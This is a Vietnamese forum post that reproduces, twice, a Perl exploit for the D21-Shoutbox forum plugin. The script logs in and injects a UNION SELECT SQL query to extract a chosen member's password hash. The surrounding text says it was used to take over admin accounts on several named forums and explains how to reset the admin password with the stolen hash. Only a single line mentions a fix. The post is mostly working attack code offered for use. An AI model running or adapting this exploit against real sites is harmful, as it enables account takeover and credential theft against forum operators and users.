boymc
06-08-06, 08:35 PM
Đây là đọan code được dùng để lại pass admin của 4rum BTX, HVF, PDL, và nhiều site khác .
################################################
#!/usr/bin/perl#
# D21-Shoutbox #
# Author : longnhi #
# Exploit Coded by Windak & langtuhaohoa #
# We are : Www.HceGroup.Net - Www.HceGroup.Biz #
################################################
use HTTP::Cookies;
use LWP 5.64;
use HTTP::R******;
# variables
my $login_page = '?act=Login&CODE=01';
my $id = '';
my $table_fix = '';
my $pose_pm_page = '?';
my $tries = 5;
my $sql = '';
my $i;
my $j;
# objects
my $ua = LWP::UserAgent->new;
my $cj = HTTP::Cookies->new (file => "N/A", autosave => 0);
my $resp;
# init the cookie jar
$ua->cookie_jar ($cj);
# allow redirects on post r******s
push @{ $ua->r******s_redirectable }, "POST";
# get user input
print ' Forum Use D21-Shoutbox URL ? ';
chomp (my $base_url = <STDIN>);
print 'Your username ? ';
chomp (my $user = <STDIN>);
$form{entered_name} = $user;
print 'Your pass ? ';
# systems without stty will error otherwise
my $stty = -x '/bin/stty';
system 'stty -echo' if $stty;# to turn off echoing
chomp (my $pass = <STDIN>);
system 'stty echo' if $stty;# to turn it back on
print "\n" if $stty;
print 'id you want get hashpass? ';# it'll say next to one of their posts
chomp (my $id = <STDIN>);
print ' Table prefix ( ex : ibf_ ) ? ';
chomp ( my $table_fix = <STDIN>);
# parse the given base url
if ($base_url !~ m#^http://#) { $base_url = 'http://' . $base_url }
if ($base_url !~ m#/$|index\.php$#) { $base_url .= '/' }
do {
$resp = $ua->post ($base_url . $login_page,
[ UserName => $user,
PassWord => $pass,
CookieDate => 1,
]);
} while ($tries-- && !$resp->is_success());
# did we get 200 (OK) ?
if (!$resp->is_success()) { die 'Error: ' . $resp->status_line . "\n" }
# was the pass right ?
if ($resp->content =~ /sorry, the password was wrong/i) {
die "Error: password incorrect.\n";
}
$| = 1;
print "\nAttempting to extract password hash from database...\n ";
$sql = "?act=Shoutbox&view=mycp&sub=ignored&do=add&id=-1 union select member_login_key,1,1 from ".$table_fix."members where id=". $id ."/*";
$resp = $ua->get ($base_url . $post_pm_page . $sql );
if (!$resp->is_success()) {
print "ERROR";
}
else {
print "";
#print $resp->content;
$rs=$resp->content;
if ( $rs =~ /uid=([a-z,0-9]{32})/ ) {print "HASH : ";print $1;
print "\n \n Bug Hunter By : Longnhi \n";
print "Exploit Coded By : Windak & langtuhaohoa ! We are : Www.HceGroup.Net ! ";
}
else { print "Can't get the pass from output, try to find it manually : "; print $resp->content;}
}
print "\x08 \x08\n hehehe ! Good luck to **** !.\n";
<STDIN>;
http://img123.imageshack.us/img123/231/untitledjt3.jpg
Trước khi nó **** thì nó phải forgot pass admin để tạo pass hash sau đó lấy pass hash đó để reset pass admin. ;)
Ai bị fix lại code shoutbox và thêm cái firewall với thư mục admin là xong .
################################################
#!/usr/bin/perl#
# D21-Shoutbox #
# Author : longnhi #
# Exploit Coded by Windak & langtuhaohoa #
# We are : Www.HceGroup.Net - Www.HceGroup.Biz #
################################################
use HTTP::Cookies;
use LWP 5.64;
use HTTP::R******;
# variables
my $login_page = '?act=Login&CODE=01';
my $id = '';
my $table_fix = '';
my $pose_pm_page = '?';
my $tries = 5;
my $sql = '';
my $i;
my $j;
# objects
my $ua = LWP::UserAgent->new;
my $cj = HTTP::Cookies->new (file => "N/A", autosave => 0);
my $resp;
# init the cookie jar
$ua->cookie_jar ($cj);
# allow redirects on post r******s
push @{ $ua->r******s_redirectable }, "POST";
# get user input
print ' Forum Use D21-Shoutbox URL ? ';
chomp (my $base_url = <STDIN>);
print 'Your username ? ';
chomp (my $user = <STDIN>);
$form{entered_name} = $user;
print 'Your pass ? ';
# systems without stty will error otherwise
my $stty = -x '/bin/stty';
system 'stty -echo' if $stty;# to turn off echoing
chomp (my $pass = <STDIN>);
system 'stty echo' if $stty;# to turn it back on
print "\n" if $stty;
print 'id you want get hashpass? ';# it'll say next to one of their posts
chomp (my $id = <STDIN>);
print ' Table prefix ( ex : ibf_ ) ? ';
chomp ( my $table_fix = <STDIN>);
# parse the given base url
if ($base_url !~ m#^http://#) { $base_url = 'http://' . $base_url }
if ($base_url !~ m#/$|index\.php$#) { $base_url .= '/' }
do {
$resp = $ua->post ($base_url . $login_page,
[ UserName => $user,
PassWord => $pass,
CookieDate => 1,
]);
} while ($tries-- && !$resp->is_success());
# did we get 200 (OK) ?
if (!$resp->is_success()) { die 'Error: ' . $resp->status_line . "\n" }
# was the pass right ?
if ($resp->content =~ /sorry, the password was wrong/i) {
die "Error: password incorrect.\n";
}
$| = 1;
print "\nAttempting to extract password hash from database...\n ";
$sql = "?act=Shoutbox&view=mycp&sub=ignored&do=add&id=-1 union select member_login_key,1,1 from ".$table_fix."members where id=". $id ."/*";
$resp = $ua->get ($base_url . $post_pm_page . $sql );
if (!$resp->is_success()) {
print "ERROR";
}
else {
print "";
#print $resp->content;
$rs=$resp->content;
if ( $rs =~ /uid=([a-z,0-9]{32})/ ) {print "HASH : ";print $1;
print "\n \n Bug Hunter By : Longnhi \n";
print "Exploit Coded By : Windak & langtuhaohoa ! We are : Www.HceGroup.Net ! ";
}
else { print "Can't get the pass from output, try to find it manually : "; print $resp->content;}
}
print "\x08 \x08\n hehehe ! Good luck to **** !.\n";
<STDIN>;
http://img123.imageshack.us/img123/231/untitledjt3.jpg
Trước khi nó **** thì nó phải forgot pass admin để tạo pass hash sau đó lấy pass hash đó để reset pass admin. ;)
Ai bị fix lại code shoutbox và thêm cái firewall với thư mục admin là xong .